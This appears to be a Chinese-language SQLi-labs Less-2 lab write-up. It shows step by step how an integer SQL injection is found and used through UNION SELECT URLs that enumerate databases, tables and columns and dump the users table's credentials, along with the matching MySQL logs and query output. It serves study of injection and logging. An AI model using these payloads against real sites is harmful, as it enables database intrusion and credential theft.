先输入' ,报错,说明此处存在漏洞,根据报错信息,此处有三个引号说明这里是接收的是整形数据,或者这里也可以输入 2-1 或者 6-2之类的整形计算,没有报错说明这里可以进行整形计算遂判断这里是整形注入。
http://10.9.0.4/Less-2/?id=1 and 1=1发现未报错,这里知道我们的数字型注入是不需要进行单引号闭合的,使用order by 1、2、3、4 测试到4的时候报错,证明有3列
http://10.9.0.4/Less-2/?id=1 order by 4
测试回显,发现2,3显示
http://10.9.0.4/Less-2/?id=-1 union select 1,2,3
然后进行爆库名
http://10.9.0.4/Less-2/?id=-1 union select 1,database(),3
查看存在那些数据库
http://10.9.0.4/Less-2/?id=-1 union select null,null,(select group_concat(schema_name) from information_schema.schemata)
接下来是对表名的爆破
http://10.9.0.4/Less-2/?id=-1 union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema='security')
对列名进行爆破
http://10.9.0.4/Less-2/?id=-1 union select null,null,(select group_concat(column_name) from information_schema.columns where table_name='users')
对username和passwd字段进行爆破,0x3a是ASCII编码,转化后是':'
http://10.9.0.4/Less-2/?id=-1 union select null,null,group_concat(id,0x3a,username,0x3a,password) from security.users
执行sql注入对应的数据库日志信息
210219 11:27:49 250 Connect [email protected] on
250 Init DB security
250 Query SELECT * FROM users WHERE id=1 order by 4 LIMIT 0,1
250 Quit
210219 11:28:09 251 Connect [email protected] on
251 Init DB security
251 Query SELECT * FROM users WHERE id=-1 union select 1,2,3 LIMIT 0,1
251 Quit
210219 11:28:23 252 Connect [email protected] on
252 Init DB security
252 Query SELECT * FROM users WHERE id=-1 union select 1,database(),3 LIMIT 0,1
252 Quit
210219 11:28:33 253 Connect [email protected] on
253 Init DB security
253 Query SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(schema_name) from information_schema.schemata) LIMIT 0,1
253 Quit
210219 11:28:43 254 Connect [email protected] on
254 Init DB security
254 Query SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema='security') LIMIT 0,1
254 Quit
210219 11:28:51 255 Connect [email protected] on
255 Init DB security
255 Query SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(column_name) from information_schema.columns where table_name='users') LIMIT 0,1
255 Quit
210219 11:29:01 256 Connect [email protected] on
256 Init DB security
256 Query SELECT * FROM users WHERE id=-1 union select null,null,group_concat(id,0x3a,username,0x3a,password) from security.users LIMIT 0,1
256 Quit
注入语句在终端进行查询
mysql> SELECT * FROM users WHERE id=1 order by 3 LIMIT 0,1 ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> SELECT * FROM users WHERE id=1 order by 4 LIMIT 0,1 ;
ERROR 1054 (42S22): Unknown column '4' in 'order clause'
mysql> SELECT * FROM users WHERE id=-1 union select 1,2,3 LIMIT 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | 2 | 3 |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> SELECT * FROM users WHERE id=-1 union select 1,database(),3 LIMIT 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | security | 3 |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(schema_name) from information_schema.schemata) LIMIT 0,1;
+------+----------+-----------------------------------------------------------------+
| id | username | password |
+------+----------+-----------------------------------------------------------------+
| NULL | NULL | information_schema,challenges,mysql,performance_schema,security |
+------+----------+-----------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema='security') LIMIT 0,1;
+------+----------+-------------------------------+
| id | username | password |
+------+----------+-------------------------------+
| NULL | NULL | emails,referers,uagents,users |
+------+----------+-------------------------------+
1 row in set (0.00 sec)
mysql> SELECT * FROM users WHERE id=-1 union select null,null,(select group_concat(column_name) from information_schema.columns where table_name='users') LIMIT 0,1;
+------+----------+----------------------+
| id | username | password |
+------+----------+----------------------+
| NULL | NULL | id,username,password |
+------+----------+----------------------+
1 row in set (0.00 sec)
mysql> SELECT * FROM users WHERE id=-1 union select null,null,group_concat(id,0x3a,username,0x3a,password) from security.users LIMIT 0,1;
+------+----------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | username | password |
+------+----------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| NULL | NULL | 1:Dumb:Dumb,2:Angelina:I-kill-you,3:Dummy:[email protected],4:secure:crappy,5:stupid:stupidity,6:superman:genious,7:batman:mob!le,8:admin:admin,9:admin1:admin1,10:admin2:admin2,11:admin3:admin3,12:dhakkan:dumbo,14:admin4:admin4 |
+------+----------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
mysql>
大概就这些......